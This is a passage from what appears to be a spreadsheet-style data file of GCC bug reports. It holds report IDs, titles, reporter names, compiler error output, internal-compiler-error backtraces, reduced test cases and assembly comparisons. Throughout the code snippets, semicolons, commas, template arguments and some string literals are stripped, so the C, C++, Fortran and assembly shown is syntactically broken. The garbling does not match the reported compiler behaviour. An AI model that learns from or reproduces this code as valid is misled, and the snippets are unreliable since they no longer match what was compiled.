/home/segher/buildall-RC/xtensa/gcc/./gcc/xgcc -B/home/segher/buildall-RC/xtensa/gcc/./gcc/ -B/n/17/segher/cross-RC/xtensa-linux/bin/ -B/n/17/segher/cross-RC/xtensa-linux/lib/ -isystem /n/17/segher/cross-RC/xtensa-linux/include -isystem /n/17/segher/cross-RC/xtensa-linux/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc  -I. -I. -I../.././gcc -I/n/17/segher/src/gcc-4.5.0-RC-20100406/libgcc -I/n/17/segher/src/gcc-4.5.0-RC-20100406/libgcc/. -I/n/17/segher/src/gcc-4.5.0-RC-20100406/libgcc/../gcc -I/n/17/segher/src/gcc-4.5.0-RC-20100406/libgcc/../include  -DHAVE_CC_TLS  -o _mulvsi3.o -MT _mulvsi3.o -MD -MP -MF _mulvsi3.dep -DL_mulvsi3 -c /n/17/segher/src/gcc-4.5.0-RC-20100406/libgcc/../gcc/libgcc2.c \
/tmp/ccoNFjKb.s: Assembler messages:
/tmp/ccoNFjKb.s:101: Error: cannot represent subtraction with an offset</t>
  </si>
  <si>
    <t>GCC-2733</t>
  </si>
  <si>
    <t>(PR C++/2717 continued) GCC (3_0-branch) fails to compile correct code (kdelibs/arts/flow/convert.cc)</t>
  </si>
  <si>
    <t>(THIS IS BASICALLY PR C++/2717 with added .ii - file)
the following code out of the kdelibs package (kdelibs/arts/flow/convert.cc) fails to compile with the following error:
the code (the complete file is attached as well as the preprocessed file:
[snip]
#ifdef HAVE_X86_FLOAT_INT
static inline long QRound (float inval)
{
long ret
asm (fistpl %0 : =m (ret) : t (inval) : st)
return ret
}
#else
static inline long QRound (float inval)
{
return (long)inval
}
#endif/
[snip]
the error:
[snip]
make[1]: Entering directory /usr/src/kde2/cvs/kdelibs/arts/flow'
/bin/sh ../../libtool --mode=compile --tag=CXX g++ -DHAVE_CONFIG_H -I. -I. -I../.. -I../../dcop -I../../libltdl -I../../kdecore -I../../kdeui -I../../kssl -I/usr/src/kde2/cvs/qt-copy/include -I/usr/X11R6/include -I/opt/kde/include -I../../arts/mcop -DQT_THREAD_SUPPORT -pthread -D_REENTRANT -O2 -DNDEBUG -fno-exceptions -fno-check-new -O3 -march=athlon -frtti -ftemplate-depth-99 -DQT_NO_TRANSLATION -DQT_CLEAN_NAMESPACE -DQT_NO_COMPAT -DQT_NO_ASCII_CAST -c convert.cc
 g++ -DHAVE_CONFIG_H -I. -I. -I../.. -I../../dcop -I../../libltdl -I../../kdecore -I../../kdeui -I../../kssl -I/usr/src/kde2/cvs/qt-copy/include -I/usr/X11R6/include -I/opt/kde/include -I../../arts/mcop -DQT_THREAD_SUPPORT -pthread -D_REENTRANT -O2 -DNDEBUG -fno-exceptions -fno-check-new -O3 -march=athlon -frtti -ftemplate-depth-99 -DQT_NO_TRANSLATION -DQT_CLEAN_NAMESPACE -DQT_NO_COMPAT -DQT_NO_ASCII_CAST -Wp-MD.deps/convert.pp -c convert.cc -fPIC -DPIC -o .libs/convert.o
 convert.cc: In function `void Arts::convert_stereo_2float_i16le(long unsigned
 int float* float* unsigned char*)':
 convert.cc:33: output number 0 not directly addressable
 convert.cc:33: output number 0 not directly addressable
 convert.cc:33: inconsistent operand constraints in an `asm'
 convert.cc:33: inconsistent operand constraints in an `asm'
 convert.cc: In function `void Arts::convert_mono_float_16le(long unsigned int
 float* unsigned char*)':
 convert.cc:33: output number 0 not directly addressable
 convert.cc:33: inconsistent operand constraints in an `asm'
 convert.cc: In function `void Arts::convert_stereo_2float_i16be(long unsigned
 int float* float* unsigned char*)':
 convert.cc:33: output number 0 not directly addressable
 convert.cc:33: output number 0 not directly addressable
 convert.cc:33: inconsistent operand constraints in an `asm'
 convert.cc:33: inconsistent operand constraints in an `asm'
 convert.cc: In function `void Arts::convert_mono_float_16be(long unsigned int
 float* unsigned char*)':
 convert.cc:33: output number 0 not directly addressable
 convert.cc:33: inconsistent operand constraints in an `asm'
 make[1]: *** [convert.lo] Error 1
 make[1]: Leaving directory `/usr/src/kde2/cvs/kdelibs/arts/flow'
 make: *** [all-recursive] Error 1
[snip]
Release:
gcc-3_0-branch (gcc version 3.0 20010503 (prerelease))
Environment:
suse 7.0 kernel 2.4.4 target i686-pc-linux-gnu gcc configuration: --enable-threads
Thread model: posix
How-To-Repeat:
try to compile kdelibs on i686-pc-linux-gnu with gcc 3.0 prerelease</t>
  </si>
  <si>
    <t>gerald.roth</t>
  </si>
  <si>
    <t>GCC-65210</t>
  </si>
  <si>
    <t>[avr] ICE: when using attributs 'address' and 'io_low'</t>
  </si>
  <si>
    <t>Compiled with
$ avr-gcc prog.c -S -Os -mmcu=atmega8
the following program ICEs:
volatile char q __attribute__((io_lowaddress(0x81)))
Target: avr
Configured with: ../../gcc.gnu.org/trunk/configure --target=avr --prefix=/local/gnu/install/gcc-5.0 --disable-shared --disable-nls --with-dwarf2 --enable-target-optspace=yes --with-gnu-as --with-gnu-ld --enable-languages=cc++lto --enable-checking=all
Thread model: single
gcc version 5.0.0 20150220 (experimental) (GCC) 
GNU C11 (GCC) version 5.0.0 20150220 (experimental) (avr)
        compiled by GNU C version 4.7.2 GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.2
ignoring nonexistent directory /local/gnu/build/gcc-trunk-avr/gcc/../lib/gcc/avr/5.0.0/include
ignoring nonexistent directory /local/gnu/build/gcc-trunk-avr/gcc/../lib/gcc/avr/5.0.0/include-fixed
ignoring nonexistent directory /local/gnu/build/gcc-trunk-avr/gcc/../lib/gcc/avr/5.0.0/../../../../avr/sys-include
ignoring nonexistent directory /local/gnu/build/gcc-trunk-avr/gcc/../lib/gcc/avr/5.0.0/../../../../avr/include
ignoring nonexistent directory /local/gnu/build/gcc-trunk-avr/gcc/../lib/gcc/../../lib/gcc/avr/5.0.0/include
ignoring nonexistent directory /local/gnu/build/gcc-trunk-avr/gcc/../lib/gcc/../../lib/gcc/avr/5.0.0/include-fixed
ignoring nonexistent directory /local/gnu/build/gcc-trunk-avr/gcc/../lib/gcc/../../lib/gcc/avr/5.0.0/../../../../avr/sys-include
ignoring nonexistent directory /local/gnu/build/gcc-trunk-avr/gcc/../lib/gcc/../../lib/gcc/avr/5.0.0/../../../../avr/include
#include ... search starts here:
#include  search starts here:
 /mnt/nfs/home/georg/gnu/build/gcc-trunk-avr/gcc/include
 /mnt/nfs/home/georg/gnu/build/gcc-trunk-avr/gcc/include-fixed
End of search list.
GNU C11 (GCC) version 5.0.0 20150220 (experimental) (avr)
        compiled by GNU C version 4.7.2 GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=0 --param ggc-min-heapsize=0
Compiler executable checksum: 63d1ce1dc9d02ab6b837fe423af8fe37
atiny.c:1:1: internal compiler error: in avr_eval_addr_attrib at config/avr/avr.c:9008
 volatile char q __attribute__((io_lowaddress(0x81)))
 ^
0x8ac4d2b avr_eval_addr_attrib(rtx_def*)
        ../../../gcc.gnu.org/trunk/gcc/config/avr/avr.c:9008
0x8ac627b avr_asm_output_aligned_decl_common(_IO_FILE* tree_node* char const* unsigned long long unsigned int bool)
        ../../../gcc.gnu.org/trunk/gcc/config/avr/avr.c:9302
0x8a8cc4e emit_common
        ../../../gcc.gnu.org/trunk/gcc/varasm.c:1979
0x8a9f86b assemble_noswitch_variable
        ../../../gcc.gnu.org/trunk/gcc/varasm.c:2034
0x8a9f86b assemble_variable(tree_node* int int int)
        ../../../gcc.gnu.org/trunk/gcc/varasm.c:2233
0x8aa2564 varpool_node::assemble_decl()
        ../../../gcc.gnu.org/trunk/gcc/varpool.c:597
0x8aa333b symbol_table::output_variables()
        ../../../gcc.gnu.org/trunk/gcc/varpool.c:750
0x830dcdd symbol_table::compile()
        ../../../gcc.gnu.org/trunk/gcc/cgraphunit.c:2360
0x830f9fc symbol_table::finalize_compilation_unit()
        ../../../gcc.gnu.org/trunk/gcc/cgraphunit.c:2436
0x817d533 c_write_global_declarations()
        ../../../gcc.gnu.org/trunk/gcc/c/c-decl.c:10803</t>
  </si>
  <si>
    <t>saaadhu</t>
  </si>
  <si>
    <t>GCC-15530</t>
  </si>
  <si>
    <t>apsi from SPEC2K issues</t>
  </si>
  <si>
    <t>apsi from SPEC2K compiles (with some warnings)
 In file apsi.f:574
      IF(NWINDX.EQ.1) PAUSE
                          1
Warning: Obsolete: PAUSE statement at (1)
/tmp/cctWASPe.s: Assembler messages:
/tmp/cctWASPe.s:29180: Warning: .space repeat count is zero ignored
it runs but the output is not totally correct: 
comparing files in
'/notnfs/dnovillo/spec2000/benchspec/CFP2000/301.apsi/run/00000002'
comparing 'APO10' with cw='' abstol='1e-07' reltol='0.01'obiwan=''skiptol=''
comparing 'APO11' with cw='' abstol='1e-07' reltol='0.01'obiwan=''skiptol=''
comparing 'APO6' with cw='' abstol='1e-07' reltol='0.01'obiwan=''skiptol=''
comparing 'APO8' with cw='' abstol='1e-07' reltol='0.01'obiwan=''skiptol=''
comparing 'APV' with cw='' abstol='1e-07' reltol='0.01'obiwan=''skiptol=''
Specinvoke: /notnfs/dnovillo/spec2000/bin/specinvoke -E -d
/notnfs/dnovillo/spec2000/b
enchspec/CFP2000/301.apsi/run/00000002 -c 1 -e compare.err -o compare.out -f
compare.c
md
*** Miscompare of APO10 see
/notnfs/dnovillo/spec2000/benchspec/CFP2000/301.apsi/run/
00000002/APO10.mis
0060:             7000.0000
                  1400.0000
                          ^
*** Miscompare of APO11 see
/notnfs/dnovillo/spec2000/benchspec/CFP2000/301.apsi/run/
00000002/APO11.mis
0001:     0.00000E+00   0.29016E+03   0.43898E+03   0.65411E-01   0.82368E-03  
0.2002
1E+03   0.13082E-03   0.00000E+00
          0.00000E+00   0.29016E+03   0.43897E+03   0.65410E-01   0.82368E-03  
0.4269
8E+03   0.13082E-03   0.00000E+00
    ^
All these can be seen in the SPEC log files produced by Diego's SPEC tester:
http://people.redhat.com/dnovillo/spec2000/gcc/log/
look in any sub-directory for the file named log.XYZ.gz</t>
  </si>
  <si>
    <t>GCC-46864</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE: verify_stmts failed: statement marked for throw but doesn't with -fnon-call-exceptions</t>
  </si>
  <si>
    <t>Created attachment 22690
reduced testcase
Compiler output:
$ g++ -O -fnon-call-exceptions pr46734.C  
pr46734.C: In function 'void foo()':
pr46734.C:18:1: error: statement marked for throw but doesn't
s.2__k_lsm.4_28 = i_29
pr46734.C:18:1: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r167621 - fail
4.5 r166509 - fail
4.4 r166509 - OK</t>
  </si>
  <si>
    <t>GCC-41006</t>
  </si>
  <si>
    <t>[4.5 Regression] verify_stmts failed: error: non-trivial conversion at assignment</t>
  </si>
  <si>
    <t>From Wine:
/home/marcus/projects/gcc.trunk/BIN/bin/gcc -m32 -c -fno-strict-aliasing   -O3  -o mswsock.o mswsock.i
mswsock.i: In function 'get_fn_pointers':
mswsock.i:17:1: error: non-trivial conversion at assignment
int (*LPFN_ACCEPTEX) (void *)
long int (*FARPROC) (void)
# .MEM_6 = VDEF 
acceptex_fn = func.0_4
mswsock.i:17:1: internal compiler error: verify_stmts failed</t>
  </si>
  <si>
    <t>GCC-65319</t>
  </si>
  <si>
    <t>FAIL: g++.dg/other/dump-ada-spec-3.C  -std=gnu++98 (internal compiler error)</t>
  </si>
  <si>
    <t>GCC-5276</t>
  </si>
  <si>
    <t>crosscompile ia64 -&gt; ppc64 fails with gcc 3.0.3</t>
  </si>
  <si>
    <t>building a cross compiler on ia64 linux for ppc64 linux
this patch is needed:
ftp://ftp.linuxppc64.org/pub/people/amodra/gcc-20011220-ppc64.diff.gz
+ ../configure --enable-languages=c --prefix=/opt/cross --target=powerpc64-linux --disable-nls
Configuring for a ia64-unknown-linux host.
*** This configuration is not supported in the following subdirectories:
     target-libstdc++-v3 target-libf2c target-libffi target-boehm-gc target-zlib target-libjava zlib fastjar ta
    (Any other directories should still work fine.)
Created Makefile in /usr/src/packages/BUILD/gcc-3.0.3/obj-powerpc64-linux using mt-frag
Configuring libiberty...
creating cache ../config.cache
checking host system type... ia64-unknown-linux-gnu
checking build system type... ia64-unknown-linux-gnu
In file included from ../../gcc/unwind-dw2.c:25:
../../gcc/unwind-pe.h: In function `size_of_encoded_value':
../../gcc/unwind-pe.h:76: warning: implicit declaration of function `abort'
../../gcc/unwind-dw2.c: In function `extract_cie_info':
../../gcc/unwind-dw2.c:220: warning: implicit declaration of function `strlen'
../../gcc/unwind-dw2.c: In function `execute_stack_op':
../../gcc/unwind-dw2.c:303: warning: `result' might be used uninitialized in this function
../../gcc/unwind-dw2.c: In function `execute_cfa_program':
../../gcc/unwind-dw2.c:778: warning: implicit declaration of function `alloca'
../../gcc/unwind-dw2.c: In function `uw_frame_state_for':
../../gcc/unwind-dw2.c:889: warning: implicit declaration of function `memset'
../../gcc/unwind-dw2.c: In function `uw_install_context_1':
../../gcc/unwind-dw2.c:1167: warning: implicit declaration of function `memcpy'
In file included from ../../gcc/unwind-dw2.c:1184:
../../gcc/unwind.inc: In function `_Unwind_RaiseException':
../../gcc/unwind.inc:129: Could not split insn
(insn 333 242 267 (set (reg:SI 0 r0 [131])
        (const_int 3896573952 [0xe8410000])) 287 {*movsi_internal1} (insn_list:REG_DEP_ANTI 242 (insn_list:REG_DEP_OUTPUT 364 (insn_list:REG_DEP_ANTI 239 (nil))))
    (nil))
../../gcc/unwind.inc:129: Internal compiler error in final_scan_insn at final.c:2951
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
reproducable since a few weeks.
works ok on ppc sparc i386.
Release:
gcc 3.0.3
How-To-Repeat:
you need an ia64 box )</t>
  </si>
  <si>
    <t>GCC-33966</t>
  </si>
  <si>
    <t>Revision 129625 caused 11% slowdown on 200.sixtrack</t>
  </si>
  <si>
    <t>Revision 129625
http://gcc.gnu.org/ml/gcc-cvs/2007-10/msg00730.html
caused 11% drop in performance for 200.sixtrack in SPEC CPU 2000
with -O2 -ffast-math on Core 2 Duo 64bit. That patch caused very
different codes generated for 200.sixtrack on x86-64.</t>
  </si>
  <si>
    <t>GCC-5812</t>
  </si>
  <si>
    <t>GCJ 3.0.2 segfaults on class file from Sun JDK 1.3 compiler</t>
  </si>
  <si>
    <t>When I compile the class definition below with the Sun JDK 1.3 compiler and then feed the class file to GCJ 3.0.2 GCJ segfaults.  I've included the .class file as an attachment.
public class Bug
{
	public int invoke() {
		try {
		}
		finally {
			return 1
		}
	}
}
Release:
GNU Java version 3.0.2 20010905 (Red Hat Linux 7.1 3.0.1-3) (i386-redhat-linux)
Environment:
Red Hat Linux 7.2
How-To-Repeat:
% gcj3 Bug.class
Bug.java: In class `Bug':
Bug.java: In method `Bug.invoke()':
Bug.java:4: Internal error: Segmentation fault
...
%</t>
  </si>
  <si>
    <t>GCC-54733</t>
  </si>
  <si>
    <t>Missing opportunity to optimize endian independent load/store</t>
  </si>
  <si>
    <t>This case tries to load from memory in little-endian way no matter what endianess current target is.
On trunk 4.8 little-endian target two byte loads should be able to combined into a single 16-byte load.
int read_aux(void * int)
int read_le()
{ 
    unsigned char data[2] 
    read_aux(data 2) 
    return data[0] | (data[1]&lt;&lt;8)
}
Current Tree (optimized):
  unsigned char data[2]
  read_aux (
  D.4064_1 = data[0]
  D.4065_2 = (int) D.4064_1
  D.4066_3 = data[1]
  D.4067_4 = (int) D.4066_3
  D.4068_5 = D.4067_4 &lt;&lt; 8
  D.4063_6 = D.4068_5 | D.4065_2
  data ={v} {CLOBBER}
  return D.4063_6
Expected Tree (optimized):
  unsigned char data[2]
  unsigned short *temp
  unsigned in D.4064
  read_aux (
  temp=
  D.4064_1 = *temp
  return D.4064_1</t>
  </si>
  <si>
    <t>GCC-23098</t>
  </si>
  <si>
    <t>[4.1 Regression] store of 0.0 to float</t>
  </si>
  <si>
    <t>Take the following program:
int g (float* g1)
{
  *g1 = 0
}
Running it on ppc-darwin on the mainline (with -static) we get:
LC0:
        .long   0
        .text
        .align 2
        .globl _g
_g:
        lis r2ha16(LC0)
        lfs f0lo16(LC0)(r2)
        stfs f00(r3)
        blr
On 4.0.0 we get:
_g:
        li r00
        stw r00(r3)
        blr
x86 have the same problem but only with -fPIC but that is not a regression:
.LC0:
        .long   0
        .text
        .p2align 415
.globl g
        .type   g @function
g:
        call    __i686.get_pc_thunk.cx
        addl    $_GLOBAL_OFFSET_TABLE_ %ecx
        movl    4(%esp) %eax
        movl    .LC0@GOTOFF(%ecx) %edx
        movl    %edx (%eax)
        ret</t>
  </si>
  <si>
    <t>GCC-70159</t>
  </si>
  <si>
    <t>missed CSE optimization</t>
  </si>
  <si>
    <t>$ cat h.c
float foo_p(float d float min float max float a)
{
  float tmin
  float tmax
  float inv = 1.0f / d
  if (inv &gt;= 0) {
    tmin = (min - a) * inv
    tmax = (max - a) * inv
  } else {
    tmin = (max - a) * inv
    tmax = (min - a) * inv
  }
  return tmax + tmin
}
$ gcc h.c -Ofast -S -o- 
foo_p:
	fmov	s4 1.0e+0
	fdiv	s0 s4 s0
	fcmpe	s0 #0.0
	blt	.L6
	fsub	s1 s1 s3
	fsub	s2 s2 s3
	fmul	s1 s1 s0
	fmul	s0 s2 s0
	fadd	s0 s1 s0
	ret
	.p2align 3
.L6:
	fsub	s4 s2 s3
	fsub	s2 s1 s3
	fmul	s1 s4 s0
	fmul	s0 s2 s0
	fadd	s0 s1 s0
	ret
$ clang h.c -Ofast -S -o-
foo_p:                                  // @foo_p
// BB#0:                                // %entry
	fmov	s4 #1.00000000
	fdiv	s0 s4 s0
	fcmp	s0 #0.0
	fcsel	s4 s1 s2 lt
	fcsel	s1 s2 s1 lt
	fsub	s1 s1 s3
	fsub	s2 s4 s3
	fadd	s1 s2 s1
	fmul	s0 s1 s0
	ret
The computations in both branches are redundant.
Even without if-conversion (fcsel) GCC should be able to sink/hoist fsub and fmul.</t>
  </si>
  <si>
    <t>GCC-21519</t>
  </si>
  <si>
    <t>ICE in generate_bytecode_conditional at java/jcf-write.c:1337</t>
  </si>
  <si>
    <t># gcc-4.0.1-20050507 
during build (gcj -C -O2 for all *.java) of the org.eclipse.jdt.core 
from eclipse 3.1M6 tarball I get: 
org/eclipse/jdt/internal/compiler/parser/RecoveredElement.java:210: 
internal compiler error: in generate_bytecode_conditional  
at java/jcf-write.c:1337  
# testcase: 
unpack eclipse-sourceBuild-srcIncluded-3.1M6.zip and run below script: 
cd plugins/org.eclipse.jdt.core 
cp -f   model/org/eclipse/jdt/core/Signature.java \ 
        compiler/org/eclipse/jdt/core 
for f in `find batch -name '*.java' -or -name '*.properties'` do 
    g=`echo $f | sed 's:^batch/:compiler/:' | xargs dirname` 
    [ -d $g ] || mkdir -p $g 
    cp -a $f $g 
done 
cd compiler 
for f in `find -name '*.java' | cut -c 3-` do 
    gcj -Wno-deprecated -C -O2 $f 
done</t>
  </si>
  <si>
    <t>GCC-52748</t>
  </si>
  <si>
    <t>[4.9 Regression][C++11] N3276 changes to decltype</t>
  </si>
  <si>
    <t>The C++11 standard section 5.2.2 pararaph 11 states that:
If a function call is a prvalue of object type [and] if the function call is [...] the operand of a decltype-specifier [...] a temporary object is not introduced for the prvalue. The type of the prvalue may be incomplete. [Note: as a result storage is not allocated for the prvalue and it is not destroyed thus a class type is not instantiated as a result of being the type of a function call in this context. 
This addition was made late in the C++11 standardization process its rationale is described in the paper N3276 [1]
It seems GCC does not currently support this. In fact when run on the trivial example given in N3276 GCC gets into an infinite loop and if left running uses up all the memory in the system (!) (Should I file that as a separate issue?)
Here is the example (WARNING - may exhaust your system's virtual memory if you're not careful):
template struct S
template struct pair {}
template S wrap(T) { return 0 }
template
struct S
{
   S(int = 0) {}
   decltype(wrap(pair())) foo() { return 0 } // ERROR
   S &gt; bar() { return 0 } // OK
}
S s
[1] http://www.open-std.org/JTC1/SC22/WG21/docs/papers/2011/n3276.pdf</t>
  </si>
  <si>
    <t>GCC-64465</t>
  </si>
  <si>
    <t>[5 Regression] internal compiler error: verify_flow_info failed</t>
  </si>
  <si>
    <t>On Linux/x86-64 r219127 gave:
[hjl@gnu-tools-1 tmp]$ cat foo.c
typedef void (*__sighandler_t) (int)
struct sigaction
  {
 __sighandler_t sa_handler
  }
extern int sigaction (const struct sigaction *__restrict __act)
extern int __open_alias (const char *__path int __oflag ...) __asm__ ( open)
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__artificial__)) int
open (const char *__path int __oflag ...)
{
  if (__builtin_constant_p (__oflag))
    return __open_alias (__path __oflag __builtin_va_arg_pack ())
  return __open_alias (__path __oflag __builtin_va_arg_pack ())
}
extern int close(int fd)
static void
set_fortify_handler (void (*handler) (int sig))
{
  struct sigaction sa
  sigaction (
  int fd = open (/dev/null 3)
  if (fd == -1)
    close (1)
}
extern void handler (int sig)
void
do_test (void)
{
  set_fortify_handler (handler)
}
[hjl@gnu-tools-1 tmp]$ /export/build/gnu/gcc-x32/release/usr/gcc-5.0.0-x32/bin/gcc -O2 foo.c   -O2 -Wall -fexceptions  
foo.c: In function â€˜set_fortify_handlerâ€™:
foo.c:31:1: error: BB 5 last statement has incorrectly set lp
 }
 ^
foo.c:31:1: internal compiler error: verify_flow_info failed
0x71e49b verify_flow_info()
	/export/gnu/import/git/gcc/gcc/cfghooks.c:271
0xb33b39 cleanup_tree_cfg_noloop
	/export/gnu/import/git/gcc/gcc/tree-cfgcleanup.c:753
0xb33b39 cleanup_tree_cfg()
	/export/gnu/import/git/gcc/gcc/tree-cfgcleanup.c:802
0xa32b14 execute_function_todo
	/export/gnu/import/git/gcc/gcc/passes.c:1893
0xa33603 execute_todo
	/export/gnu/import/git/gcc/gcc/passes.c:1997
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-5757</t>
  </si>
  <si>
    <t>Throwing exception in constructor causes segfault during unwind</t>
  </si>
  <si>
    <t>If during allocation of an array of T one of the constructors throws an exception it causes a 'Segmentation fault' in function free(void*).
During stack unwinding operator delete[](void*) is called with an address different from the one returned by operator new[](unsigned).
In my example new returns 0x804aa80 while delete is passed 0x804aa84. I guess 4 is the array allocation overhead.
Release:
3.0.3
Environment:
System: Linux barrel 2.4.4-4GB #4 Sat Dec 1 23:57:55 CET 2001 i686 unknown
Architecture: i686
    Pentium II 450 Mhz Linux/ELF
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.0.3/configure --enable-threads --enable-shared --prefix=/usr/local/gcc-3.0.3
How-To-Repeat:
Source file t.cpp with the following code:
class   X
{
public:
        X::X()
        {
            throw 
        }
        X::~X()
        {
        }
}
int main()
{
    try
    {
        X* p = new X[4]
        delete [] p
    }
    catch(...)
    {
    }
    return 0
}
Compile with:
g++ -Wall -Werror t.cpp -o t</t>
  </si>
  <si>
    <t>j.kuipers</t>
  </si>
  <si>
    <t>GCC-16681</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] array initialization in struct construct is a memory hog</t>
  </si>
  <si>
    <t>This code compiles quickly and with little memory in gcc-2.95 through gcc-3.2
but in gcc-3.3 and gcc-3.4 it will take up to a gig and a half (or so) of memory
and take 2 minutes and 20 seconds to compile (vs .06 in earlier versions).
struct foo {
  unsigned char buffer[4111222]
  foo() 
    : buffer()
    {}
}
int main(void)
{
}
Here is my compiler information information (on the one system that could
compile the whole thing also tried it with g++-2.95 g++-3.2 g++-3.3 and g++-3.4
on an up to date debian unstable machine):
[~]$ time g++ -v -save-temps -Wall foo.cpp
Reading specs from /usr/local/gcc-3.4.1/lib/gcc/i686-pc-linux-gnu/3.4.1/specs
Configured with: ../gcc-3.4.1/configure --prefix=/usr/local/gcc-3.4.1
--enable-languages=cc++
Thread model: posix
gcc version 3.4.1
 /usr/local/gcc-3.4.1/libexec/gcc/i686-pc-linux-gnu/3.4.1/cc1plus -E -quiet -v
-D_GNU_SOURCE foo.cpp -mtune=pentiumpro -Wall -o foo.ii
ignoring nonexistent directory
/usr/local/gcc-3.4.1/lib/gcc/i686-pc-linux-gnu/3.4.1/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/gcc-3.4.1/lib/gcc/i686-pc-linux-gnu/3.4.1/../../../../include/c++/3.4.1
 /usr/local/gcc-3.4.1/lib/gcc/i686-pc-linux-gnu/3.4.1/../../../../include/c++/3.4.1/i686-pc-linux-gnu
 /usr/local/gcc-3.4.1/lib/gcc/i686-pc-linux-gnu/3.4.1/../../../../include/c++/3.4.1/backward
 /usr/local/include
 /usr/local/gcc-3.4.1/include
 /usr/local/gcc-3.4.1/lib/gcc/i686-pc-linux-gnu/3.4.1/include
 /usr/include
End of search list.
 /usr/local/gcc-3.4.1/libexec/gcc/i686-pc-linux-gnu/3.4.1/cc1plus -fpreprocessed
foo.ii -quiet -dumpbase foo.cpp -mtune=pentiumpro -auxbase foo -Wall -version -o
foo.s
GNU C++ version 3.4.1 (i686-pc-linux-gnu)
        compiled by GNU C version 3.4.1.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
 as --traditional-format -V -Qy -o foo.o foo.s
GNU assembler version 2.11.90.0.8 (i386-redhat-linux) using BFD version 2.11.90.0.8
 /usr/local/gcc-3.4.1/libexec/gcc/i686-pc-linux-gnu/3.4.1/collect2 -m elf_i386
-dynamic-linker /lib/ld-linux.so.2 /usr/lib/crt1.o /usr/lib/crti.o
/usr/local/gcc-3.4.1/lib/gcc/i686-pc-linux-gnu/3.4.1/crtbegin.o
-L/usr/local/gcc-3.4.1/lib/gcc/i686-pc-linux-gnu/3.4.1
-L/usr/local/gcc-3.4.1/lib/gcc/i686-pc-linux-gnu/3.4.1/../../.. foo.o -lstdc++
-lm -lgcc_s -lgcc -lc -lgcc_s -lgcc
/usr/local/gcc-3.4.1/lib/gcc/i686-pc-linux-gnu/3.4.1/crtend.o /usr/lib/crtn.o
real    2m17.412s
user    2m14.220s
sys     0m3.140s
Thats a redhat 7.2 system but as I said above it happens on a debian-unstable
box too (it doesn't have enough memory to complete the compile only 512 megs).
Here is the foo.ii:
# 1 foo.cpp
# 1 
# 1 
# 1 foo.cpp
struct foo {
  unsigned char buffer[4111222]
  foo()
    : buffer()
    {}
}
int main(void)
{
}
Sorry if this isn't in the right format and let me know if anymore information
is needed I read through the guidelines looked at the frequently reported bugs
and searched but didn't find the bug.</t>
  </si>
  <si>
    <t>lafary</t>
  </si>
  <si>
    <t>GCC-52270</t>
  </si>
  <si>
    <t>[OOP] Polymorphic vars: wrong intent(in) check passing nonptr variable to intent(in) ptr dummy</t>
  </si>
  <si>
    <t>From http://j3-fortran.org/doc/meeting/197/12-131.txt
The following program is rejected with:
-----------------------------------------------------
      p%c = 3
      1
Error: Dummy argument 'p' with INTENT(IN) in variable definition context (assignment) at (1)
    Call s(x)
           1
Error: Actual argument to 'p' at (1) must be polymorphic
-----------------------------------------------------
The first item is bogus as 'p' is a pointer and pointer intents only affect the pointer association status. Something must go wrong with regards to polymorphic types.
The second error is formally correct but the quoted interpretation request by Malcolm Cohen suggests to make it valid that would be consistent with the Fortran 2008 changes regarding pointerintent(in). One could consider to defer this part until it has passed J3 (or even WG3) voting.
  Program m013
    Type t
      Real c
    End Type
    Type(t)Target :: x
    Call s(x)
    Print *x%c
  Contains
    Subroutine s(p)
      Class(t)PointerIntent(In) :: p
      p%c = 3
    End Subroutine
  End Program</t>
  </si>
  <si>
    <t>GCC-29303</t>
  </si>
  <si>
    <t>gcov.texi: Invoking gcov section header needs @command.</t>
  </si>
  <si>
    <t>The following patch should be applied to gcov.texi in order for the Invoking gcov section header to match the style of the other section headers in the gcov chapter:
Index: gcov.texi
===================================================================
--- gcov.texi	(revision 117335)
+++ gcov.texi	(working copy)
@@ -1107 +1107 @@
 @c man end
 @node Invoking Gcov
-@section Invoking gcov
+@section Invoking @command{gcov}
 @smallexample
 gcov @r{[}@var{options}@r{]} @var{sourcefile}</t>
  </si>
  <si>
    <t>bmoses</t>
  </si>
  <si>
    <t>GCC-35338</t>
  </si>
  <si>
    <t>[4.3/4.4 regression] Broken diagnostics for fixed-point types</t>
  </si>
  <si>
    <t>Broken diagnostics are issued for the following invalid code snippet
on mainline and 4.3 branch:
====================================================
int i = 1r
bool b = !1r
====================================================
bug.cc:1: error: cannot convert '#'fixed_point_type' not supported by dump_type#' to 'int' in initialization
bug.cc:2: error: could not convert '#'fixed_cst' not supported by dump_expr#' to 'bool'
bug.cc:2: error: in argument to unary !</t>
  </si>
  <si>
    <t>GCC-50611</t>
  </si>
  <si>
    <t>Error reporting routines re-entered</t>
  </si>
  <si>
    <t>namespace std class multiset
namespace blue_sky template  class smart_ptr
typedef unsigned ulong
typedef
blue_sky::smart_ptr 
  spv_float
struct wpi_strategy_3d
{
  enum
  {
    D
    typedef ulong vertex_pos_i
      template &lt;
      class
      strat_t &gt; struct wpi_impl:
      public
    {
      strat_t::D
      typedef
      std::multiset 
intersect_path
class
intersect_action
      {
      public:typedef
{
} remove_dups2 ()
{
  typedef int
    dirvec_t[D]
  struct top_surv
  {
  top_surv (dirvec_t 
  dirvec_t
    dir
  {
top_surv (dir x_ m_size_)}} intersect_path &amp;
  x_
  vertex_pos_i
  m_size_
      }
      well_path_ident_d (
  {
  intersect_action A (
      A.remove_dups2 ()}
      spv_float well_path_ident
      {
      wpi_impl &lt;
      wpi_strategy_3d &gt;::
      well_path_ident_d}
}
}
}
